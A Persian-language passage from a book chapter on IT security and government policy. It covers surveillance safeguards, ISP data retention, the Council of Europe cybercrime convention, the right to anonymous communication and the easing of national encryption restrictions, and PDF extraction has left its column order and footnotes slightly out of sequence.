ﺿﻮﺍﺑﻂ ﺍﺯ ﻧﻈﺮ ﻓﻨﺎﻭﺭﻱ ﺧﻨﺜﻲ ﺑﺎﺷﻨﺪ )ﺑﺎ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻋـﻢ
ﺍﺯ ﺗﻠﻔﻨﻲ ،ﺗﺼﻮﻳﺮﻱ ،ﺩﺍﺩﻩ ﺧﻄﻮﻁ ﺳـﻴﻤﻲ ﻳـﺎﺑﻲ ﺳـﻴﻢ ،ﺩﻳﺠﻴﺘـﺎﻝ ﻳـﺎ
ﺁﻧﺎﻟﻮﮒ ،ﺑﻪ ﻳﻚ ﺷﻜﻞ ﺑﺮﺧﻮﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ(؛
•
ﺣﻮﺯﻩ ﻭ ﻣﺪﺕﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﻧﻈﺎﺭﺕ ﻣﺤﺪﻭﺩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻫـﻴﭻ
ﻣﻮﺭﺩﻱ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺯﻣﺎﻥ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺕ
ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﺒﺎﺷﺪ؛
•
ﻞ ﻧﻘـﺾ ﺣـﺮﻳﻢ
ﻧﻈﺎﺭﺗﻬﺎ ﺑﻪ ﻃﺮﻳﻘﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺣﺪﺍﻗ ﹺ
ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛
•
ﻗﻮﺍﻧﻴﻦ ،ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ ﺣﺎﺻـﻞ ﺍﺯ ﺭﺩﻳـﺎﺑﻲ ﺭﺍ ﺗﻮﺿـﻴﺢ
ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ؛ ﻭ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺩﻳﮕـﺮﻱ ﺑﻜـﺎﺭ
ﻧﺮﻭﻧﺪ؛
•
ﻗﺎﻧﻮﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻـﺪﻭﺭ ﺣﻜـﻢ ﺑـﺮﺍﻱ ﻣـﺘﻬﻢ ﺭﺍ ﻣـﺸﺨﺺ
ﻛﺮﺩﻩ ﺑﺎﺷﺪ؛
•
ﻗﺎﻧﻮﻥ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺗﺤـﺖ ﺑﺮﺭﺳـﻲ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ -ﻣﺴﺘﻘﻞ ﺍﺯ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ -ﭘﺲ ﺍﺯ ﭘﺎﻳﺎﻥ
ﻛﺎﺭ ﺑﺎﻳﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ؛ ﻭ
•
ﭼﻨﺎﻧﭽﻪ ﻃﺒـﻖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻛـﺴﻲ ﺩﺭ
ﺟﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺭﺩﻳﺎﺑﻲ ﻣـﻮﺭﺩ ﺗﺠـﺎﻭﺯ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ،
ﻃﺒﻖ ﻗﺎﻧﻮﻥ ،ﺟﺒﺮﺍﻥ ﻛﻠﻴﺔ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﻟﺰﺍﻣﻲ ﺑﺎﺷﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺟﺮﻳـﺎﻥ ﺗﺤﻘﻴـﻖ ﻭ ﻫﻨﮕـﺎﻡ ﺗـﺼﺮﻑ
ﻋﻮﺍﻣﻞ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺩﺭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺣﻜﺎﻡ ﺩﻭﻟﺖ
ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ )ﺍﺯ ﺟﻤﻠﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺿﻮﺍﺑﻂ
ﺧﺎﺻﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺗﻠﻔﻨﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺍﻋﻤﺎﻝ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﺩﺭ ﺑﻌﻀﻲ
ﻛﺸﻮﺭﻫﺎ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )ISPﻫـﺎ( ٨٧ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ
ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟﺖ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ
ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺩﺭﺻﺪﺩ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮ
ﻣﺒﻨﺎﻱ ﺁﻥ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻠﺰﻡ ﺑـﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎﻱ
ﺗﺮﺍﻓﻴﻜﻲ ﺩﺭ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺮﺍﻱ ﻳﻚ ﺣﺪﺍﻗﻞ ﺯﻣﺎﻧﻲ ﻣﻲﺑﺎﺷﻨﺪ
)ﺿﺎﺑﻄﻪﺍﻱ ﻛﻪ ﺑﻪ ﺁﻥ "ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ" ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ( .ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ
ﺑﺴﻴﺎﺭ ﺑﺤﺚﺑﺮﺍﻧﮕﻴﺰ ﺑﻮﺩﻩ ﻭ ﺑـﻪ ﻋﻠـﺖ ﺗﻬﺪﻳـﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺗﺤﻤﻴﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ
ﺑﺮ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ،ﻣﻮﺭﺩ ﺍﻧﺘﻘﺎﺩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ .ﺑﺮﺭﺳـﻲ
ﻛﺎﻣﻠﺘﺮ ﺿﻮﺍﺑﻂ ﻧﻈﺎﺭﺕ ،ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ .ﺑﺎ ﺍﻳـﻦ
ﻭﺟﻮﺩ ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛـﻪ ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ
ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ،ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
ﻓﻨﻲ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺤﻤﻴـﻞ ﻧﻤـﻲﻛﻨـﺪ .ﺍﻳـﻦ
ﻣﻌﺎﻫﺪﻩ ﺗﻨﻬﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ،ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﺩﺳـﺘﻴﺎﺑﻲ
ﺑﻪﺩﺍﺩﻩﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﺷﺮﻛﺘﻬﺎ ﺑﻬـﺮﻩ ﻣـﻲﺑـﺮﺩ .ﺍﻳـﻦ ﺍﻣـﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﺗﻐﻴﻴـﺮ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺩﺭﺑـﺎﺭﺓ
ﻣﺴﺎﺋﻞ ﺧـﺼﻮﺻﻲ ﺩﺭ ﺣـﻮﺯﺓ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻲ ﻣﻨﺘـﺸﺮ
ﺳﺎﺧﺖ ﻛـﻪ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳـﺎﻳﻞ
ﻧﮕﻬــﺪﺍﺭﻱ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﻣــﻲﺩﺍﺩ ،ﺍﻣــﺎ ﺁﻧﻬــﺎ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ ﺍﻳﻨﻜــﺎﺭ
ﻧﻤﻲﺳﺎﺧﺖ.
Internet Service Providers
87
٢٥١
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﮔﻤﻨﺎﻣﻲ
٨٨
ﺭﻣﺰﮔﺬﺍﺭﻱ
ﺭﻣﺰﮔﺬﺍﺭﻱ ٩١ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺖ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ ﺩﺭ ﺳـﺎﻝ ،۲۰۰۱ﻣﺘـﺬﻛﺮ ﺷـﺪ:
"ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑـﻮﻳﮋﻩ ﺑـﺎ ﺭﺷـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺑﻲﺳﻴﻢ ﺿﺮﻭﺭﻱ ﺍﺳـﺖ" .ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻳـﻦ ﺍﻣـﺮ ،ﺭﻭﻧـﺪ ﻛﻠـﻲ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺩﺭ ﺧﺼﻮﺹ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻳـﺪ ﻗـﻮﺍﻧﻴﻦ ﻣﺤـﺪﻭﺩ
ﻛﻨﻨﺪﺓ ﻛﺎﺭﺑﺮﺩ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺣـﺬﻑ ﻛﻨـﺪ ﻳـﺎ ﻛـﺎﻫﺶ ﺩﻫـﺪ .ﺩﺭ
ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ،ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺪﻧﺒﺎﻝ
ﻛﻨﺘﺮﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻮﺩﻧﺪ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻧﺪ ﻛـﻪ ﺩﺭ ﺣﺎﻟـﺖ
ﻛﻠﻲ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺎﻋـﺚ ﺍﻓـﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﻣـﻲﺷـﻮﺩ .ﺳﻴﺎﺳـﺖ
Anonymity
The Legitimity of Anonymous
Communications
Authentication
Encryption
88
89
90
91
ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ۱۹۹۰ﻛﺸﻮﺭﻫﺎﻱ ﻛﺎﻧﺎﺩﺍ ،ﺁﻟﻤﺎﻥ ،ﺍﻳﺮﻟﻨـﺪ ﻭ ﻓﻨﻼﻧـﺪ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ OECD
ﺗﻬﻴﻪ ﻛﺮﺩﻧﺪ ،ﺗﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺭﺍﻳﮕﺎﻥ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻤـﻚ ﻛـﺮﺩﻩ
ﺑﺎﺷــﻨﺪ .ﻓﺮﺍﻧــﺴﻪ ﻛــﻪ ﺳــﺎﺑﻘﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺩﺭ ﻣﺤــﺪﻭﺩﻛﺮﺩﻥ
ﻼ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺷﺖ ﺩﺭ ﮊﺍﻧﻮﻳﻪ ﺳﺎﻝ ۱۹۹۹ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺭﺍ ﻛـﺎﻣ ﹰ
ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﻭ ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﻣﺤـﺪﻭﻳﺖ
ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺩﺭ ﺩﺳﺎﻣﺒﺮ ،۱۹۹۷ﺑﻠﮋﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﻝ ۱۹۹۴ﺧـﻮﺩ
ﺩﺭ ﺧﺼﻮﺹ ﻣﺤﺪﻭﺩﻳﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺍﺻـﻼﺡ ﻧﻤـﻮﺩ .ﺍﻳـﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﺠﺎﺭﺕ ﻣﺤﺼﻮﻻﺕ ﻭ
ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺑﻮﺩ ،ﺗﻤﺎﻣﻲ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺍﻳﻦ
ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺭﻓﻊ ﻛﺮﺩ.
ﻗﺎﻧﻮﻥ ﻭ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻩﺍﻧـﺪ
ﻛﻪ ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣـﺆﺛﺮ ﺗﻬﺪﻳـﺪﺍﺕ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ﻭ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ
ﻳﺎﺩﺁﻭﺭ ﺷﺪ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﻧﻴﺰ ﺩﺭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺿﺮﻭﺭﻱ ﻣـﻲﺑﺎﺷـﺪ،
ﭼﺮﺍﻛﻪ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺍﻧﮕﻴﺰﺓ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ ﺑـﺬﻝ ﺗﻮﺟـﻪ ﻻﺯﻡ ﺑـﻪ
ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ :ﻗﻴﻤﺘﻬﺎﻱ ﺑﺎﺯﺍﺭ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﺯﺗـﺎﺏ
ﺩﻗﻴﻖ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﺳﺮﻣﺎﻳﻪ ﮔـﺬﺍﺭﻱ ﺑـﺮ ﺭﻭﻱ ﺍﻣﻨﻴـﺖ ﻧﻴـﺴﺖ؛ ﻭ
ﻻ ﻧـﻪ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻧـﻪ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﻫﻴﭽﻜـﺪﺍﻡ
ﻣﻌﻤﻮ ﹰ
ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻡ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺭﻛـﻮﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﻲﺗـﻮﺟﻬﻲ ﺑـﻪ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺗﺤﻤﻞ ﻛﻨﻨـﺪ؛ ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕـﺮ ﻛﻨﺘـﺮﻝ ﺑـﺮ
ﺍﻳﻨﺘﺮﻧﺖ ﭘﺮﺍﻛﻨﺪﻩ ﺍﺳﺖ ﻭ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﭘﻴﭽﻴﺪﮔﻲ ﺷـﺒﻜﻪﻫـﺎ،
ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ .ﺑـﺴﻴﺎﺭﻱ
ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺷﺪﻳﺪﻱ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺍﺭﻧــﺪ ،ﺍﺯ ﺗﺎﺭﻳﺨﭽــﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ -ﻧﻈﻴــﺮ
ﺿﻮﺍﺑﻂ ﺍﻳﻤﻨﻲ ،ﺭﻗﺎﺑﺖ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﻣﺤﻴﻄﻲ -ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺍﻣﺮﻭﺯﻩ
ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﺑﻄــﻮﺭ ﻓﺮﺁﻳﻨــﺪﻩﺍﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﻓﻬﺮﺳــﺖ
ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﺩﻭﻟﺘﻬﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻣﻲﺁﻭﺭﻧﺪ.
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻘﺮﺭﺍﺕ ﻣﺨـﺎﻃﺮﻩﺁﻣﻴـﺰ ﻫـﺴﺘﻨﺪ .ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺯ ﺑﻌـﻀﻲ
ﺟﻬﺎﺕ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﺳﻴﻠﺔ ﺍﺭﺗﺒﺎﻃﻲ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﻗﺎﻧﻮﻥ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ
ﺍﺳﺖ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺩﺭ ﺟﻬـﺖ
ﻗﺎﻧﻮﻥﺯﺩﺍﻳﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻮﺩﻩ ﺍﺳﺖ .ﺭﻗﺎﺑـﺖ ﻭ ﻧـﻮﺁﻭﺭﻱ،
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺣـﻖ ﻣﻬـﻢ
ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻩ ﺍﺳﺖ :ﺣـﻖ
ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺼﻮﺭﺕ ﮔﻤﻨـﺎﻡ .٨٩ﮔـﺰﺍﺭﺵ ﺗﻔـﺴﻴﺮﻱ ﺍﻳـﻦ
ﻣﻌﺎﻫﺪﻩ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺗﻮﻗـﻊ
ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺛﺒﺖ ﻧـﺎﻡ ﻣـﺸﺘﺮﻛﻴﻦ ﺧـﻮﺩ ﺭﺍ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﻪ
ﻣﻮﺟﺐ ﺍﻳﻦ ﻣﻌﺎﻫـﺪﻩ ،ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﺛﺒـﺖ
ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺘﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺸﺘﺮﻛﻴﻦ ﻭ ﻳﺎ ﻣﻘﺎﻭﻣـﺖ ﺩﺭ
ﺑﺮﺍﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻣﺴﺘﻌﺎﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲ ﺑﺎﺷﻨﺪ .ﺷـﻮﺭﺍﻱ
ﺍﺭﻭﭘــﺎ ﺩﺭ ﺳــﺎﻝ ۲۰۰۳ﺑﻴﺎﻧﻴــﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﺁﺯﺍﺩﻱ ﺍﺭﺗﺒﺎﻃــﺎﺕ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎ ﺍﻳﻦ ﻣﻀﻤﻮﻥ ﺑـﻪ ﭼـﺎﭖ ﺭﺳـﺎﻧﺪ" :ﺑﻤﻨﻈـﻮﺭ ﺍﻓـﺰﺍﻳﺶ
ﺍﻧﺘﺸﺎﺭ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﺪﻩﻫﺎ ،ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻳـﺪﺓ
ﻛﺎﺭﺑﺮﺍﻥ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻧﺪ ﻭ ﻧـﻪ ﻫﻮﻳـﺖ ﺁﻧـﺎﻥ" .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ،
ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺑﺼﻮﺭﺕ ﮔﻤﻨﺎﻡ ﺭﺍ
ﺑﻪ ﺭﺳﻤﻴﺖ ﺷﻨﺎﺧﺖ ﻭ ﺑﺎ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﻳﺠـﺎﺩ
ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻣﻦﺗﺮ ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ" :ﮔﻮﻧـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﺑـﺎ
ﺁﻥ ﺗﻌﺎﻣﻞ ﺩﺍﺭﻳﻢ ﻻﺯﻡ ﺍﺳﺖ .ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻻﺯﻡ ﺑﺎﺷــﺪ ﻳــﺎ ﺗــﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷــﻮﺩ ﻛــﻪ ﮔﻤﻨــﺎﻡ ﺑــﺎﻗﻲ ﺑﻤــﺎﻧﻴﻢ".
ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻄﺎﻟﻌـﺎﺕ ﺷـﺒﻜﻪ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺳـﺎﻝ
